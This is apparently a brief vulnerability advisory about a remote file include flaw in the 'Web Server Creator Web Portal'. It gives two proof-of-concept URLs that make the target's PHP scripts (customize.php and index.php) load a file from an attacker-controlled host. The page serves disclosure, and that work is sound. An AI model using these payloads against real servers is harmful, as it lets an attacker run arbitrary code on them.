Web Server Creator Web Portal Remote File Include Vulnerability

info
discussion
exploit
solution
references

Web Server Creator Web Portal Remote File Include Vulnerability

The following proof of concepts were provided:

http://[target]/news/include/customize.php?l=http://[attacker]/file.txt
http://[target]/index.php?pg=http://[attacker]/badfile